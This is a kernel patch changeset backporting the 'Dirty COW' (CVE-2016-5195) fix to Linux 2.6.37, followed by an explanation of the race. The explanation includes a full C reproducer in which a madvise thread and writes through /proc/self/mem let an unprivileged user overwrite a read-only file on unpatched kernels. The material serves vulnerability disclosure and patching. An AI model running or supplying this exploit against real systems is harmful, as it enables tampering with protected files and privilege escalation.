# HG changeset patch
# User Pascal Bellard
# Date 1477060314 -7200
# Node ID d4e29f7d8c7cd907cc6bf8fa0c7a13fbb319bd39
# Parent  798e77f8326009aab4de276b456e7f7923612310
linux: CVE-2016-5195

diff -r 798e77f83260 -r d4e29f7d8c7c linux/receipt
--- a/linux/receipt	Wed Jul 27 13:48:34 2016 +0200
+++ b/linux/receipt	Fri Oct 21 16:31:54 2016 +0200
@@ -75,6 +75,7 @@
 003-squashfs-x86-support-xz-compressed-kernel.patch
 004-squashfs-add-xz-compression-support.patch
 005-squashfs-add-xz-compression-configuration-option.patch
+$PACKAGE-CVE-2016-5195.u
 EOT
 
 [ ! -x /usr/bin/cook ] && report step "Make kernel proper and then build lguest"
diff -r 798e77f83260 -r d4e29f7d8c7c linux/stuff/linux-CVE-2016-5195.u
--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/linux/stuff/linux-CVE-2016-5195.u	Fri Oct 21 16:31:54 2016 +0200
@@ -0,0 +1,84 @@
+--- linux-2.6.37/include/linux/mm.h
++++ linux-2.6.37/include/linux/mm.h
+@@ -1415,6 +1415,7 @@
+ #define FOLL_GET	0x04	/* do get_page on page */
+ #define FOLL_DUMP	0x08	/* give error on hole if it would be zero */
+ #define FOLL_FORCE	0x10	/* get_user_pages read/write w/o permission */
++#define FOLL_COW	0x4000	/* internal GUP flag */
+ 
+ typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
+ 			void *data);
+--- linux-2.6.37/mm/memory.c
++++ linux-2.6.37/mm/memory.c
+@@ -1225,6 +1225,24 @@
+ }
+ EXPORT_SYMBOL_GPL(zap_vma_ptes);
+ 
++static inline bool can_follow_write_pte(pte_t pte, struct page *page,
++					unsigned int flags)
++{
++	if (pte_write(pte))
++		return true;
++
++	/*
++	 * Make sure that we are really following CoWed page. We do not really
++	 * have to care about exclusiveness of the page because we only want
++	 * to ensure that once COWed page hasn't disappeared in the meantime
++	 * or it hasn't been merged to a KSM page.
++	 */
++	if ((flags & FOLL_FORCE) && (flags & FOLL_COW))
++		return page && PageAnon(page) && !PageKsm(page);
++
++	return false;
++}
++
+ /**
+  * follow_page - look up a page descriptor from a user-virtual address
+  * @vma: vm_area_struct mapping @address
+@@ -1286,10 +1304,13 @@
+ 	pte = *ptep;
+ 	if (!pte_present(pte))
+ 		goto no_page;
+-	if ((flags & FOLL_WRITE) && !pte_write(pte))
+-		goto unlock;
+ 
+ 	page = vm_normal_page(vma, address, pte);
++	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, page, flags)) {
++		pte_unmap_unlock(ptep, ptl);
++		return NULL;
++	}
++
+ 	if (unlikely(!page)) {
+ 		if ((flags & FOLL_DUMP) ||
+ 		    !is_zero_pfn(pte_pfn(pte)))
+@@ -1310,7 +1331,7 @@
+ 		 */
+ 		mark_page_accessed(page);
+ 	}
+-unlock:
++
+ 	pte_unmap_unlock(ptep, ptl);
+ out:
+ 	return page;
+@@ -1464,17 +1485,13 @@
+ 				 * The VM_FAULT_WRITE bit tells us that
+ 				 * do_wp_page has broken COW when necessary,
+ 				 * even if maybe_mkwrite decided not to set
+-				 * pte_write. We can thus safely do subsequent
+-				 * page lookups as if they were reads. But only
+-				 * do so when looping for pte_write is futile:
+-				 * in some cases userspace may also be wanting
+-				 * to write to the gotten user page, which a
+-				 * read fault here might prevent (a readonly
+-				 * page might get reCOWed by userspace write).
++				 * pte_write. We cannot simply drop FOLL_WRITE
++				 * here because the COWed page might be gone by
++				 * the time we do the subsequent page lookups.
+ 				 */
+ 				if ((ret & VM_FAULT_WRITE) &&
+ 				    !(vma->vm_flags & VM_WRITE))
+-					foll_flags &= ~FOLL_WRITE;
++					foll_flags |= FOLL_COW;
+ 
+ 				cond_resched();
+ 			}
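
Background: this is the 2.6.37 backport of the upstream "Dirty COW" fix
("mm: remove gup_flags FOLL_WRITE games from __get_user_pages()").
Instead of clearing FOLL_WRITE once do_wp_page() has broken COW, and
thereby letting the retried lookup succeed on whatever page is mapped
by then, __get_user_pages() now sets FOLL_COW, and follow_page() only
honours a forced write through a non-writable PTE while the page is
still the anonymous, non-KSM COW copy. The sketch below is a minimal
userspace reproducer in the spirit of the public dirtyc0w.c PoC,
illustrative only and untested here (error handling omitted; the page
size and loop count are hard-coded assumptions). On an unpatched
kernel, the madvise(MADV_DONTNEED) thread can discard the COW copy
between the write fault and the retried page lookup, so the
/proc/self/mem write lands on the original read-only file page:

/*
 * Sketch of the race closed by FOLL_COW (after the public dirtyc0w.c
 * PoC).  Run as an unprivileged user against a file that is readable
 * but not writable; on a vulnerable kernel its contents can change.
 * Build with: cc -pthread sketch.c
 */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

#define LOOPS 1000000

static char *map;	/* private, read-only mapping of the target file */

static void *madvise_thread(void *arg)
{
	int i;

	/* Repeatedly discard the private COW copy of the first page. */
	for (i = 0; i < LOOPS; i++)
		madvise(map, 4096, MADV_DONTNEED);
	return NULL;
}

static void *write_thread(void *arg)
{
	/*
	 * Writes via /proc/self/mem use get_user_pages() with
	 * FOLL_FORCE -- the path follow_page() now guards with
	 * can_follow_write_pte().
	 */
	int fd = open("/proc/self/mem", O_RDWR);
	int i;

	for (i = 0; i < LOOPS; i++) {
		lseek(fd, (uintptr_t)map, SEEK_SET);
		write(fd, "m00!", 4);
	}
	close(fd);
	return NULL;
}

int main(int argc, char **argv)
{
	pthread_t t1, t2;
	int fd = open(argv[1], O_RDONLY);

	map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
	pthread_create(&t1, NULL, madvise_thread, NULL);
	pthread_create(&t2, NULL, write_thread, NULL);
	pthread_join(t1, NULL);
	pthread_join(t2, NULL);
	return 0;
}

With the patch applied, once the COW copy is gone the retried lookup
fails the can_follow_write_pte() check, get_user_pages() faults again
and re-COWs, and the underlying file is never modified.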